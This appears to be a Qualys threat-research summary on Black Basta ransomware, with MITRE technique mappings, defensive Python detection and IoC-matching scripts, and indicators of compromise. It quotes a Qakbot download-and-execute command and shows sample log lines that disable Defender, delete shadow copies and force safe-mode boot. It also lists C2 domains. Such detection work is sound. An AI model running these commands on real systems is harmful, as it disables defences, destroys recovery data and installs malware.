Essential Insights on Black Basta Ransomware | Qualys Security Blog

Black Basta operates as ransomware-as-a-service (RaaS) and uses double extortion, demanding payment for decryption and the non-release of stolen data. It has impacted 500+ organizations globally, with initial access commonly gained via phishing, Qakbot, Cobalt Strike, and vulnerability exploitation. #BlackBasta #Qakbot #CobaltStrike #Mimikatz #FIN7 #RaaS

Key points

  • Black Basta employs double extortion, demanding payment for both decryption and data non-release.
  • Spotted in April 2022 and linked to 500+ organizations worldwide.
  • Initial access methods include phishing, Qakbot, Cobalt Strike, and exploitation of known vulnerabilities.
  • Tools used by the group include Qakbot, Cobalt Strike, Mimikatz, and other utilities.
  • Ransomware encrypts files using ChaCha20 with an RSA-4096 key; shadow copies are deleted to hinder recovery.
  • Defense evasion and persistence techniques include PowerShell, registry modifications, and safe-mode reboot via bcdedit.
  • Qakbot C2 activity enables deployment of additional malware and data exfiltration with tools like Rclone and WinSCP.

MITRE Techniques

  • [T1566] Phishing – The infection chain starts with spear phishing delivering a malicious link or attachment. ‘The Black Basta infection chain usually starts with a spear phishing email campaign that delivers a malicious link or attachment to the victim.’
  • [T1190] Exploit Public-Facing Application – Initial access via vulnerability exploitation and RDP. ‘Other initial infection vectors, like exploitation of vulnerabilities and remote desktop protocol (RDP), were also used by this threat actor.’
  • [T1083] File and Directory Discovery – Discovery phase as the group identifies sensitive files for exfiltration. ‘Once installed, Black Basta first identifies and collects sensitive files for exfiltration.’
  • [T1204.002] User Execution: Malicious File – Delivery via malicious documents/links leading to execution. ‘downloaded zip archives contain malicious .lnk (shortcut) or an Excel file that downloads and executes Qakbot malware.’
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Use of cmd-like commands to download and execute payloads. ‘/q /c MD "%APPDATA%\xxxxxx" && curl.exe --output %APPDATA%\xxxxxx\qakbot.js hxxps://xxxxx[.]com/xxx.js && cd "%APPDATA%\xxxxxx" && wscript qakbot.js’
  • [T1047] Windows Management Instrumentation – WMI usage as part of toolset for attack phases. ‘Windows Management Instrumentation – T1047’
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell scripts used for defense evasion (DisableAntiSpyware, etc.). ‘PowerShell – T1059.001’
  • [T1543.003] Create or Modify System Process: Windows Service – Persistence through system processes. ‘Persistence: Create or Modify System Process: Windows Service – T1543.003’
  • [T1068] Exploitation for Privilege Escalation – Exploitation of vulnerabilities to escalate privileges. ‘Exploitation for Privilege Escalation – T1068’
  • [T1497] Virtualization/Sandbox Evasion – Evasion of analysis environments. ‘Virtualization/Sandbox Evasion – T1497’
  • [T1562.009] Impair Defenses: Safe Mode Boot – Reboot in safe mode to disable defenses. ‘Safe Mode Boot – T1562.009’
  • [T1036] Masquerading – Obfuscation and deception of files or processes. ‘Masquerading – T1036’
  • [T1112] Modify Registry – Registry changes to impede defenses or customize UI. ‘Modify Registry – T1112’
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Disabling security tools like Windows Defender. ‘Impair Defenses: Disable or Modify Tools – T1562.001’
  • [T1490] Inhibit System Recovery – Deleting shadow copies to prevent recovery. ‘Inhibit System Recovery – T1490’
  • [T1486] Data Encrypted for Impact – Encrypting data to cause impact. ‘Data Encrypted for Impact – T1486’
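Several of the techniques above leave a distinctive command line behind: the curl-then-wscript download chain (T1059.003), the DisableAntiSpyware registry change (T1562.001), shadow copy deletion (T1490) and the bcdedit safe-mode boot (T1562.009). The following detection script is an added example, not code from Qualys or the original post; it assumes a hypothetical pipe-separated process-creation log format and runs over five constructed sample lines (no real telemetry). The exact vssadmin/bcdedit command shapes it matches are the standard Windows ones rather than anything quoted on this page.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Hypothetical process-creation log format assumed for this example:
#   timestamp|host|user|parent_image|command_line
# The five lines below are constructed for illustration, not real telemetry.
SAMPLE_LOG = r"""
2024-09-19T10:01:02Z|WS01|alice|outlook.exe|cmd.exe /q /c MD "%APPDATA%\Xyz" && curl.exe --output %APPDATA%\Xyz\update.js hxxp://example[.]invalid/x.js && cd "%APPDATA%\Xyz" && wscript update.js
2024-09-19T10:05:40Z|WS01|SYSTEM|services.exe|powershell.exe -nop -w hidden Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
2024-09-19T10:06:10Z|WS01|SYSTEM|cmd.exe|vssadmin.exe delete shadows /all /quiet
2024-09-19T10:06:12Z|WS01|SYSTEM|cmd.exe|bcdedit.exe /set {default} safeboot network
2024-09-19T10:07:00Z|WS01|alice|explorer.exe|notepad.exe C:\Users\alice\notes.txt
"""


@dataclass(frozen=True)
class Rule:
    technique: str  # MITRE ATT&CK id as listed on the page
    name: str
    pattern: "re.Pattern[str]"


# One rule per behaviour; each pattern is applied to the command-line field only.
RULES: List[Rule] = [
    Rule("T1562.009", "bcdedit configures a safe-mode boot",
         re.compile(r"\bbcdedit(?:\.exe)?\b.*\bsafeboot\b", re.I)),
    Rule("T1490", "volume shadow copies deleted",
         re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b"
                    r"|\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    Rule("T1562.001", "Defender disabled through DisableAntiSpyware",
         re.compile(r"DisableAntiSpyware", re.I)),
    Rule("T1059.003", "curl download chained into wscript execution",
         re.compile(r"\bcurl(?:\.exe)?\b.*\s(?:-o|--output)\s.*&&.*\bwscript(?:\.exe)?\b", re.I)),
]


@dataclass(frozen=True)
class Hit:
    timestamp: str
    host: str
    user: str
    technique: str
    name: str
    command_line: str


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into its five fields; return None for malformed input."""
    parts = line.split("|", 4)  # maxsplit keeps any '|' inside the command line intact
    if len(parts) != 5:
        return None
    ts, host, user, parent, cmd = parts
    return {"timestamp": ts, "host": host, "user": user, "parent": parent, "cmd": cmd}


def scan(lines: Iterable[str]) -> List[Hit]:
    """Return every (line, rule) match in log order; a line may hit more than one rule."""
    hits: List[Hit] = []
    for raw in lines:
        rec = parse_line(raw.strip())
        if rec is None:
            continue
        for rule in RULES:
            if rule.pattern.search(rec["cmd"]):
                hits.append(Hit(rec["timestamp"], rec["host"], rec["user"],
                                rule.technique, rule.name, rec["cmd"]))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(f"{h.timestamp} {h.host} {h.user}: [{h.technique}] {h.name}")
```

The rules are deliberately narrow (specific binary plus its tell-tale argument) so that benign administration does not trip them; in practice the shadow-copy and safe-boot rules fire rarely enough on workstations that a single hit from a non-admin context is worth a ticket on its own, while the DisableAntiSpyware rule should be correlated with the parent process, since GPO-driven configuration can set the same value legitimately.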

Indicators of Compromise

  • [SHA256] Black Basta file hashes – 17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90, b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9, and 2 more hashes
  • [C2 Domain] Command-and-control domains used by Cobalt Strike beacons – trailshop[.]net, realbumblebee[.]net, and 2 more domains
  • [Filename] Ransom note files dropped by the ransomware – readme.txt, instructions_read_me.txt
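Published indicators arrive defanged (`trailshop[.]net`, `hxxps://`) and hashes arrive in mixed case, so the first job of an IoC sweep is normalisation; the second is matching domains as suffixes so that `cdn.trailshop.net` is caught but `notrailshop.net` is not. The script below is an added example, not code from Qualys or the original post. It uses only the two hashes, two domains and two ransom-note names listed on this page, and runs them against a constructed file inventory, a constructed DNS log in a hypothetical `timestamp host qname` format, and a constructed list of dropped files.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Indicators exactly as listed on the page. Domains are kept defanged and
# refanged at load time so the published list can be pasted in unchanged.
IOC_SHA256 = {
    "17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90",
    "b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9",
}
IOC_DOMAINS_DEFANGED = ["trailshop[.]net", "realbumblebee[.]net"]
RANSOM_NOTE_NAMES = {"readme.txt", "instructions_read_me.txt"}


def refang(value: str) -> str:
    """Turn a defanged indicator (hxxp scheme, [.] dots) back into matchable, lower-case form."""
    return re.sub(r"^hxxp", "http", value.strip(), flags=re.I).replace("[.]", ".").lower()


IOC_DOMAINS = [refang(d) for d in IOC_DOMAINS_DEFANGED]


def domain_matches(qname: str, ioc_domains: Iterable[str] = IOC_DOMAINS) -> Optional[str]:
    """Return the matching IoC domain if qname equals it or is a subdomain of it."""
    q = qname.lower().rstrip(".")
    for d in ioc_domains:
        if q == d or q.endswith("." + d):
            return d
    return None


def match_hash_inventory(records: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """records: (path, sha256) pairs from an endpoint file inventory; hashes normalised to lower case."""
    out: List[Tuple[str, str]] = []
    for path, digest in records:
        h = digest.strip().lower()
        if h in IOC_SHA256:
            out.append((path, h))
    return out


def match_dns_log(lines: Iterable[str]) -> List[Tuple[str, str, str, str]]:
    """Hypothetical 'timestamp host qname' log format assumed for this example."""
    out: List[Tuple[str, str, str, str]] = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        ts, host, qname = parts[0], parts[1], parts[2]
        ioc = domain_matches(qname)
        if ioc:
            out.append((ts, host, qname, ioc))
    return out


def match_ransom_notes(paths: Iterable[str]) -> List[str]:
    # Low-fidelity on its own: readme.txt is a common benign name, so treat a hit
    # here as corroboration for hash or C2 matches rather than as an alert by itself.
    return [p for p in paths
            if p.replace("\\", "/").rsplit("/", 1)[-1].lower() in RANSOM_NOTE_NAMES]


# Constructed sample telemetry (not real data)
FILE_INVENTORY = [
    (r"C:\Users\alice\Downloads\invoice.exe",
     "B32DAF27AA392D26BDF5FAAFBAAE6B21CD6C918D461FF59F548A73D447A96DD9"),
    (r"C:\Windows\System32\notepad.exe", "0" * 64),
]
DNS_LOG = """\
2024-09-19T11:00:00Z WS01 cdn.trailshop.net
2024-09-19T11:00:05Z WS01 www.example.invalid
2024-09-19T11:00:09Z WS02 notrailshop.net
"""
DROPPED_FILES = [r"C:\Users\alice\Desktop\readme.txt", r"C:\Users\alice\Desktop\report.docx"]

if __name__ == "__main__":
    print("hash hits:", match_hash_inventory(FILE_INVENTORY))
    print("dns hits:", match_dns_log(DNS_LOG.splitlines()))
    print("note hits:", match_ransom_notes(DROPPED_FILES))
```

The suffix check in `domain_matches` is the part most often done wrong in ad-hoc sweeps: a plain `endswith("trailshop.net")` would also flag `notrailshop.net`, and a plain equality check would miss beacon traffic to a subdomain. Hash matches are the high-confidence signal here; DNS hits say a host resolved the name, not that it connected, so pair them with proxy or firewall logs before calling it an infection.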

Read more: https://blog.qualys.com/vulnerabilities-threat-research/2024/09/19/black-basta-ransomware-what-you-need-to-know#indicators-of-compromise